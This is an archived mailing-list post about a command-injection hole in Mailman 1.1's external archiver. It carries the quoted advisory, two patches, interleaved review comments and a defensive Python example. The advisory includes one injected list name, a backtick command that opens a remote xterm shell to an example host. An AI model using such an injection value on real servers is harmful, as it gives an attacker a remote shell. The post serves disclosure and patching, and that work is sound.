[Mailman-Users] Mailman 1.1 + external archiver vulnerability
Todd Pfaff
pfaff at edge.cis.mcmaster.ca
Fri Sep 8 23:37:23 CEST 2000
I checked my mailman-1.1 installation to see if it was vulnerable as
indicated. It turned out that I could not exploit this hole because of a
patch that I had applied earlier to fix some other problem.
This patch ensures that the external archiver expansion of %(listname)s
uses the self._internal_name of the list rather than the real_name, which
can not be modified by the list admin. This patch does not prevent the
list admin from changing the real_name to something malicious, so it will
not protect against any other part of mailman-1.1 that has a vulnerable
external command call that can be influenced by a listname expansion.
IMHO, real_name was a bad choice for that property. I think a more
correct name for the admin-modifiable name property would have been
public_name, display_name or formatted_name.
Here's the patch:
--- Mailman/Archiver/Archiver.py.orig Fri Sep 3 23:16:02 1999
+++ Mailman/Archiver/Archiver.py Tue Feb 22 08:54:06 2000
@@ -183,7 +183,7 @@
post.SetHeader('Date', olddate)
def ExternalArchive(self, ar, txt):
- d = SafeDict({'listname': self.real_name})
+ d = SafeDict({'listname': self._internal_name})
cmd = ar % d
extarch = os.popen(cmd, 'w')
extarch.write(txt)
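Review bot: The swap to `d = SafeDict({'listname': self._internal_name})` removes the admin-controlled value from the expansion, but the sink is left as it was: `cmd = ar % d` is still passed to `os.popen(cmd, 'w')`, which runs it through a shell with the substituted value unquoted. Any other key a PUBLIC_EXTERNAL_ARCHIVER template pulls through SafeDict still reaches that shell unescaped (the advisory quoted below says the same for its own patch), so consider quoting each substituted value, or validating it against a strict character allowlist, inside ExternalArchive as well; that also covers an internal name that happens to contain a space.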
On Fri, 8 Sep 2000, Christopher P. Lindsey wrote:
> Date: Fri, 8 Sep 2000 14:16:12 -0500
> From: Christopher P. Lindsey <lindsey at mallorn.com>
> To: mailman-users at python.org
> Subject: [Mailman-Users] Mailman 1.1 + external archiver vulnerability
>
> SUMMARY
>
> Mailman from www.list.org is a mailing list manager with strong Web
> functionality. If a site is running Mailman 1.1 with an external
> archiving mechanism that uses the internal variable %(listname)s,
> list administrators can run any command with the Webserver's
> uid/gid.
>
> A patch is available at the end of this message.
>
> WHO'S VULNERABLE
>
> Sites running versions prior to Mailman 1.2beta with external
> archiving enabled.
>
> HISTORY
>
> This bug was reported to the developers in late November, 1999, and
> was fixed in the CVS source tree. Newer beta versions of Mailman
> are not susceptible, yet it has recently come to my attention
> that the vulnerable 1.1 package is still available as a stable,
> non-beta release on the Mailman site(s):
>
> ftp://ftp.list.org/pub/mailman/
> ftp://ftp.gnu.org/gnu/mailman/
>
> DETAILS
>
> Mailman has a mechanism that allows messages sent to a mailing list to
> be pumped into some sort of external program. Traditionally this
> involves some sort of Web-based archiver like MHonArc or hypermail.
> To make the archiving more powerful, macros can be used based on
> internal Mailman values. For example, list archives can be saved
> on a per list basis with this line in $prefix/Mailman/mm_cfg.py:
>
> PUBLIC_EXTERNAL_ARCHIVER = '(mhonarc -add -nolock -umask 023 -rcfile rc.%(listname)s -outdir /mnt/WWW/htdocs/lists/%(listname)s)'
>
> The problem comes from the %(listname)s expansion. Since it's derived
> from a value that can be set on a per list basis by the list administrator,
> it's subject to tampering. Consider a list whose name was changed
> to
>
> `/usr/X11R6/bin/xterm -display myhost.example.com:0 -e /bin/csh`
>
> by a list administrator. As soon as a message is sent to the list
> this command will be executed, opening a remote xterm with a shell
> running with the Web server's uid/gid. Any command available to the
> Web server can be executed in this fashion.
>
> Other variable names can be accessed if your PUBLIC_EXTERNAL_ARCHIVER
> definition is configured to use them. The patch below will only
> fix problems with %(listname)s expansion.
>
> SOLUTION
>
> Upgrade to a later version of Mailman, or install the supplied patch.
>
> PATCH
>
> This patch was provided by the Mailman developers and later cleaned up
> to work against a stock 1.1 distribution. It works by only allowing
> listowners to change case values within the name of their list.
>
> Obviously a better long-term solution that sanitizes system calls, etc.
> should be considered.
>
> The purpose of this report is not to disrespect the Mailman
> team or the software, but rather to warn users who have been
> downloading the 1.1 package while waiting for the beta to emerge
> as a final release.
>
> Christopher Lindsey
> lindsey at mallorn.com
> Mallorn Computing, Inc.
>
> -------------------- snip snip --------------------
> *** admin.py.bak Mon Mar 13 21:03:53 2000
> --- admin.py Mon Mar 13 21:04:51 2000
> ***************
> *** 784,789 ****
> --- 784,800 ----
> val = cgi_info[property].value
> value = GetValidValue(lst, property, kind, val, deps)
> if getattr(lst, property) != value:
> + # TBD: Ensure that lst.real_name differs only in letter
> + # case. Otherwise a security hole can potentially be opened
> + # when using an external archiver. This seems ad-hoc and
> + # could use a more general security policy.
> + if property == 'real_name' and \
> + string.lower(value) <> string.lower(lst._internal_name):
> + # then don't install this value.
> + document.AddItem("""<p><b>real_name</b> attribute not
> + changed! It must differ from the list's name by case
> + only.<p>""")
> + continue
> setattr(lst, property, value)
> dirty = 1
> #
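Review bot: The guard `if property == 'real_name' and string.lower(value) <> string.lower(lst._internal_name)` validates one property on one input path (the admin CGI that reads `cgi_info`); the archiver expansion still formats whatever the list object holds into a shell command, so any other attribute a PUBLIC_EXTERNAL_ARCHIVER template references, or any other code path that sets real_name, is not covered. The TBD comment already concedes this is ad hoc; the more general policy it asks for belongs at the sink, where every value substituted into the command is quoted or checked against an allowlist. Minor: the HTML in `document.AddItem` opens two `<p>` and closes neither; ending with `</p>` keeps the admin page well-formed.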
> -------------------- snip snip --------------------
>
>
> ------------------------------------------------------
> Mailman-Users maillist - Mailman-Users at python.org
> http://www.python.org/mailman/listinfo/mailman-users
>
--
Todd Pfaff \ Email: pfaff at mcmaster.ca
Computing and Information Services \ Voice: (905) 525-9140 x22920
ABB 132 \ FAX: (905) 528-3773
McMaster University \
Hamilton, Ontario, Canada L8S 4M1 \
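The two defences discussed in this thread, restricting real_name to case-only changes and expanding the archiver command from the internal list name, as an added example in modern Python that is not Mailman's own code. It goes one step further than either patch by allowlisting the substituted name and splitting the command into an argv list so it can run without a shell. The template is the one from the advisory; SAFE_LISTNAME and the sample names are assumptions.

```python
import re
import shlex

# Template taken from the advisory's PUBLIC_EXTERNAL_ARCHIVER example (mhonarc).
ARCHIVER_TEMPLATE = ("mhonarc -add -nolock -umask 023 -rcfile rc.%(listname)s "
                     "-outdir /mnt/WWW/htdocs/lists/%(listname)s")

# Hypothetical allowlist: characters a list name may contain before it is
# substituted into a command line. Anything else is rejected outright.
SAFE_LISTNAME = re.compile(r"^[A-Za-z0-9_.-]+$")


def real_name_allowed(internal_name, new_real_name):
    """Mirror the admin.py patch: the admin-editable real_name may differ
    from the fixed internal list name by letter case only."""
    return new_real_name.lower() == internal_name.lower()


def build_archiver_cmd(template, internal_name):
    """Expand the template the way Archiver.py does after the patch, i.e.
    from the internal name, never from real_name. Before the value gets
    anywhere near a shell it must pass the allowlist; shlex.quote is then
    a no-op for safe names but stays as defence in depth."""
    if not SAFE_LISTNAME.match(internal_name):
        raise ValueError("unsafe list name: %r" % internal_name)
    return template % {"listname": shlex.quote(internal_name)}


def archiver_argv(template, internal_name):
    """Turn the expanded command into an argv list. Feeding this to
    subprocess.Popen(argv, stdin=PIPE) instead of os.popen(cmd, 'w')
    removes the shell from the picture entirely."""
    return shlex.split(build_archiver_cmd(template, internal_name))


if __name__ == "__main__":
    # Constructed sample values: a legitimate case-only rename and a name
    # containing shell metacharacters, which must be refused.
    print(real_name_allowed("mailman-users", "Mailman-Users"))
    print(archiver_argv(ARCHIVER_TEMPLATE, "mailman-users"))
    try:
        build_archiver_cmd(ARCHIVER_TEMPLATE, "bad `name`")
    except ValueError as exc:
        print("rejected:", exc)
```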